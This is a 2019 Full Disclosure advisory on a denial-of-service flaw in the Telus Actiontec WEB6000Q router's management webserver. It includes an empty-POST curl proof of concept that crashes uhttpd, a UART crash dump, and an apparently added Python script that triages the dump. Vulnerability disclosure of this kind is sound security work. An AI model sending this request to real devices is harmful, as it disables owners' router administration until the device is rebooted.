Date: Sun, 9 Jun 2019 12:29:11 -0600
From: Andrew Klaus <andrew@...aus.ca>
To: fulldisclosure@...lists.org
Subject: [FD] Telus Actiontec WEB6000Q Denial of Service of Management Interface

###  Device Details
Discovered By: Andrew Klaus (andrew@...aus.ca)
Vendor: Actiontec (Telus Branded)
Model: WEB6000Q
Affected Firmware: 1.1.02.22

Reported: July 2018
CVE:  Not needed since update is pushed by the provider.


### Summary of Findings
Querying CGI endpoints with empty (GET/POST/HEAD) requests causes a
segmentation fault in the uhttpd webserver. Since there is no watchdog
on this daemon, a device reboot is needed to restart the webserver
before any modification can be made to the device.

### Proof of Concept:

$ curl -X POST -ik http://192.168.1.2/forgot_password.cgi
curl: (52) Empty reply from server

$ curl -X POST -ik http://192.168.1.2/forgot_password.cgi
curl: (7) Failed to connect to 192.168.1.2 port 80: Connection refused


### UART console output after attack:

<4>[  726.578000] uhttpd/452: potentially unexpected fatal signal 11.
<4>[  726.583000]
<4>[  726.585000] Cpu 1
<4>[  726.587000] $ 0   : 00000000 10008d00 00000000 00000000
<4>[  726.592000] $ 4   : 00000000 00000000 00000000 00000000
<4>[  726.598000] $ 8   : 81010100 3d3d3d3d 77a00000 f0000000
<4>[  726.603000] $12   : 00000001 6570743a 202a2f2a 00416b5c
<4>[  726.608000] $16   : 00000000 00000000 00000000 7fe14ebe
<4>[  726.614000] $20   : 00404c84 775168a0 0046d470 0084ee6c
<4>[  726.619000] $24   : 00000186 00411030
<4>[  726.624000] $28   : 00464620 7fe12800 7fe12800 00416c20
<4>[  726.630000] Hi    : 000000c9
<4>[  726.633000] Lo    : 0001e791
<4>[  726.636000] epc   : 00411078 0x411078
<4>[  726.640000]     Tainted: P
<4>[  726.643000] ra    : 00416c20 0x416c20
<4>[  726.647000] Status: 00008d13    USER EXL IE
<4>[  726.652000] Cause : 00000008
<4>[  726.655000] BadVA : 00000000
<4>[  726.657000] PrId  : 0002a080 (Broadcom BMIPS4350)
<4>[  726.663000]
<4>[  726.663000] Userspace Call Trace: process uhttpd, pid 452, signal 11
<4>[  726.671000] [<00411078>] /sbin/uhttpd
<4>[  726.674000] [<00416c20>] /sbin/uhttpd
<4>[  726.678000] [<00416d68>] /sbin/uhttpd
<4>[  726.682000] [<00407cd4>] /sbin/uhttpd
<4>[  726.686000] [<00416c20>] /sbin/uhttpd
<4>[  726.689000] [<0047cb94>] (unknown)


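A triage sketch for the UART dump above, added here as an example and not part of the original advisory: it decodes the MIPS Cause register and BadVA to show that the fault is a read from address 0 (a NULL dereference) at the reported epc. The `triage` function and `SAMPLE` (a subset of the advisory's log lines) are constructed for illustration, and reading register words as big-endian is an assumption.

```python
import re

# MIPS32 Cause.ExcCode values (bits 6..2) relevant to user-space memory faults.
EXC_CODES = {1: "Mod", 2: "TLBL (load/fetch)", 3: "TLBS (store)",
             4: "AdEL (load/fetch)", 5: "AdES (store)"}

# Constructed sample: a subset of the UART lines quoted in the advisory.
SAMPLE = """\
<4>[  726.578000] uhttpd/452: potentially unexpected fatal signal 11.
<4>[  726.603000] $12   : 00000001 6570743a 202a2f2a 00416b5c
<4>[  726.636000] epc   : 00411078 0x411078
<4>[  726.652000] Cause : 00000008
<4>[  726.655000] BadVA : 00000000
"""

def triage(log):
    """Summarise a MIPS user-space fatal-signal dump from the kernel log."""
    out = {}
    m = re.search(r"\] (\S+)/(\d+): potentially unexpected fatal signal (\d+)", log)
    if m:
        out.update(process=m.group(1), pid=int(m.group(2)), signal=int(m.group(3)))
    for key in ("epc", "Cause", "BadVA"):
        m = re.search(r"\] %s\s*: ([0-9a-f]{8})" % key, log)
        if m:
            out[key.lower()] = int(m.group(1), 16)
    if "cause" in out:
        code = (out["cause"] >> 2) & 0x1F
        out["exception"] = EXC_CODES.get(code, "ExcCode %d" % code)
    # A faulting address in the first page is the signature of a NULL dereference.
    if "badva" in out:
        out["null_deref"] = out["badva"] < 0x1000
    # Registers holding printable bytes often show which input was being parsed
    # (words are read as big-endian here, which is an assumption).
    text = ""
    for row in re.findall(r"\] \$\s*\d+\s*: ((?:[0-9a-f]{8} ?)+)", log):
        for word in row.split():
            raw = bytes.fromhex(word)
            if all(0x20 <= b < 0x7F for b in raw):
                text += raw.decode("ascii")
    out["ascii_in_registers"] = text
    return out

if __name__ == "__main__":
    for k, v in triage(SAMPLE).items():
        print(k, "=", hex(v) if k in ("epc", "cause", "badva") else v)
```

Because epc (0x411078) differs from BadVA (0), the TLBL exception here is a data load rather than an instruction fetch. The printable bytes in `$13` and `$14` match the tail of the `Accept: */*` header that curl sends by default.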
